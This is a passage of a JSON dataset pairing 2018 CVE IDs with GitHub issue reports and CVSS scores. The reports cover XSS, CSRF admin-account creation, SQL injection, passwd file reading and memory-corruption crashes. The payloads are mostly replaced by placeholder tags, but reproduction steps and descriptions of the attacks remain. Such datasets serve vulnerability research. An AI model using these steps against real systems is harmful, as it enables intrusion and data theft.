        "description": "FILETAG Seperti apa yang diharapkan? Pengembang perlu melakukan filter spesial karakter untuk memfilter atau menggunakan library anti XSS yang terdapat pada CI untuk megantisipasi serangan XSS. Apa yang terjadi? Serangan XSS dapat berdampak pada sisi client. Melalui serangan ini dapat dimanfaatkan oleh attacker untuk mengambil cookies korban, mengalihkan kehalaman yang mengandung malware atau phising site. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13040",
        "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1176",
        "Issue_Url_new": "https://github.com/opensid/opensid/issues/1176",
        "Repo_new": "opensid/opensid",
        "Issue_Created_At": "2018-07-01T08:36:19Z",
        "description": "FILETAG FILETAG NUMBERTAG Karena tidak terdapat CSRF token yang unique, maka fitur tersebut dapat dieksploitasi menggunakan serangan CSRF. Berikut ini merupakan script exploit untuk serangan CSRF tambah akun selevel admin. ERRORTAG NUMBERTAG Apabila script diatas dilempar dan tereksekusi oleh pengguna (admin) yang sedang login pada sistem opensid, maka secara otomatis akan menambahkan pengguna baru. FILETAG FILETAG NUMBERTAG Setelah akun selevel admin berhasil ditambahkan, tentu akun tersebut dapat digunakan untuk login ke opensid dan mengambil alih sistem tersebut. Seperti apa yang diharapkan? Perlu menambahkan unique token CSRF pada setiap perubahan data baik pada method POST maupun GET untuk menghindari serangan jenis ini. Apa yang terjadi? Melalui bug CSRF ini, sistem bisa saja diambil alih oleh attacker. Namun untuk berhasil atau tidaknya, perlu adanya interaksi antara attacker dan korban. Bila korban mengakses script exploit CSRF pada saat kondisi login, maka serangan berhasil. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13049",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/4270",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/4270",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2018-07-02T05:52:36Z",
        "description": "NUMBERTAG SQL injection in FILETAG . Steps to reproduce (which actions have you made) : login in the glpi and make the reques FILETAG with the poc I sended the detail of the vulnerability to glpi EMAILTAG rg Expected result : you can find the result in the sql error.log Actual result : the same with the Expected result URL of the page : FILETAG Screenshot of the problem (if pertinent) : Your GLPI setup (you can find it in Setup > General menu, System tab) : you can find it in asset >computer",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13050",
        "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/1",
        "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/1",
        "Repo_new": "x-f1v3/forcve",
        "Issue_Created_At": "2018-07-02T06:15:21Z",
        "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Proof of Concept: CODETAG This is a time based blind SQL Injection vulnerability .So I use sqlmap to exploit it APITAG following is a proof screenshot. FILETAG Databases: FILETAG User: FILETAG Table: FILETAG data: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13065",
        "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/1829",
        "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/1829",
        "Repo_new": "spiderlabs/modsecurity",
        "Issue_Created_At": "2018-07-04T10:14:11Z",
        "description": "Information about new CVETAG APITAG Adipta Basu). Hi, just to inform you that yesterday NUMBERTAG rd July NUMBERTAG was published as a presumptive vulnerability on APITAG NUMBERTAG The author writes that using the following two payloads, inside an argument on the request querystring, it was able to elude XSS filters: ERRORTAG and ERRORTAG . First: the author of the CVE has not included information about the ruleset that he used during his test. Second: if he used the CRS3, obviously both payloads are detected by the rule APITAG (XSS Attack Detected via libinjection) with a Paranoia Level set to NUMBERTAG I've written to APITAG including all these information and asking for tag this CVE as DISPUTED until the author gives more information. Based on what he has written on exploit db ( URLTAG it seems that he hasn't used any ruleset... otherwise he needs to specify it. Anyway, IMHO, the CVE description is wrong because identifies as vulnerable APITAG instead a rule or a ruleset. What do you think about?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13066",
        "Issue_Url_old": "https://github.com/libming/libming/issues/146",
        "Issue_Url_new": "https://github.com/libming/libming/issues/146",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-07-02T14:21:04Z",
        "description": "Memory leak in parser.c. `jsx APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG dd NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdd8 in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG fd5 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fca7 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG eb9 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG c3a2 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f4bb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdfb in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fbda in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG b2c5 in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG edb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG aaf9 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f9c5 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG caf in APITAG PATHTAG NUMBERTAG fc in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u2019\u2018\u2019 poc URLTAG listswf $poc",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13106",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/489",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/489",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-07-03T13:32:02Z",
        "description": "Stored XSS is found in CMS Clipper NUMBERTAG ersion. Affected Version : Clipper NUMBERTAG Affected URL: PATHTAG Steps to POC NUMBERTAG Under Tools > Configuration Found multiple stored XSS APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-13112",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/477",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/477",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-07-03T07:03:24Z",
        "description": "heap buffer overflow in PATHTAG function get_l2len. heap buffer overflow in PATHTAG function get_l2len command: APITAG asan report: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13121",
        "Issue_Url_old": "https://github.com/921580451/RealOnePlayer-sBug/issues/1",
        "Issue_Url_new": "https://github.com/921580451/realoneplayer-sbug/issues/1",
        "Repo_new": "921580451/RealOnePlayer-sBug",
        "Issue_Created_At": "2018-07-03T03:32:44Z",
        "description": "There is a Denial of service vulnerability. Use APITAG Build NUMBERTAG to open the file in archive, will cause a crash. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-13122",
        "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/49",
        "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/49",
        "Repo_new": "self-evident/onefilecms",
        "Issue_Created_At": "2018-07-03T14:12:25Z",
        "description": "onefilecms.php in APITAG through NUMBERTAG might allow attackers to delete anyfile or folders they want on the delete screen. access FILETAG by username/password FILETAG access URLTAG FILETAG Click APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13123",
        "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/50",
        "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/50",
        "Repo_new": "self-evident/onefilecms",
        "Issue_Created_At": "2018-07-03T14:21:03Z",
        "description": "FILETAG in APITAG through NUMBERTAG might allow attackers to access some secret file like passwd. onefilecms.php in APITAG through NUMBERTAG might allow attackers to access some secret file like passwd access APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13136",
        "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/456",
        "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/456",
        "Repo_new": "ultimatemember/ultimatemember",
        "Issue_Created_At": "2018-06-08T11:44:43Z",
        "description": "Security Issue. Ultimate Member Version Tell us what UM core version you use NUMBERTAG Subject of the issue Persistent XSS vulnerability. Steps to reproduce the behavior APITAG page title as APITAG APITAG APITAG Ultimate Members > Settings, It ll reflected in General Tab All Vectors. APITAG reset NUMBERTAG D NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13139",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/397",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/397",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2018-07-03T04:08:59Z",
        "description": "stack buffer overflow in psf_memset in PATHTAG stack buffer overflow in psf_memset in PATHTAG FILETAG ./sndfile deinterleave $poc NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffea NUMBERTAG d0 at pc NUMBERTAG f NUMBERTAG a3bec bp NUMBERTAG ffea NUMBERTAG e2f0 sp NUMBERTAG ffea NUMBERTAG da NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffea NUMBERTAG d0 thread T NUMBERTAG f NUMBERTAG a3beb in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG fc NUMBERTAG bf in psf_memset PATHTAG NUMBERTAG f NUMBERTAG ed NUMBERTAG in sf_readf_int PATHTAG NUMBERTAG e1c in deinterleave_int PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) Address NUMBERTAG ffea NUMBERTAG d0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in main PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13153",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1195",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1195",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-04T08:05:57Z",
        "description": "memory leak bug in APITAG APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG hello,i find a memory leak bug in imagemagick,the details is on the Steps to Reproduce. Steps to Reproduce <! List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code ( ERRORTAG filelist=(char ) APITAG )); CODETAG if ((status == APITAG || (number_files NUMBERTAG if (number_files NUMBERTAG ERRORTAG APITAG ) NULL); } ERRORTAG filenames); APITAG ) NULL); }` APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13250",
        "Issue_Url_old": "https://github.com/libming/libming/issues/147",
        "Issue_Url_new": "https://github.com/libming/libming/issues/147",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-07-04T12:38:26Z",
        "description": "SEGV on decompile.c. ERRORTAG swftotcl $poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13251",
        "Issue_Url_old": "https://github.com/libming/libming/issues/149",
        "Issue_Url_new": "https://github.com/libming/libming/issues/149",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-07-04T13:18:41Z",
        "description": "An integer overflow . ERRORTAG swftotcl $poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13339",
        "Issue_Url_old": "https://github.com/TylerGarlick/angular-redactor/issues/77",
        "Issue_Url_new": "https://github.com/tylergarlick/angular-redactor/issues/77",
        "Repo_new": "tylergarlick/angular-redactor",
        "Issue_Created_At": "2018-07-05T09:34:36Z",
        "description": "XSS Vulnerability Discovered. Description: The stored XSS can be triggered once you editing content by using Redactor NUMBERTAG in HTML Mode. POC NUMBERTAG I pen tested the official showcase website of Redactor NUMBERTAG URLTAG it has a demo editor in its front page. Then, click the icon to use HTML content mode: FILETAG NUMBERTAG inject XSS payload APITAG APITAG NUMBERTAG SS discovered! APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13339",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/796",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/796",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-07-05T09:10:11Z",
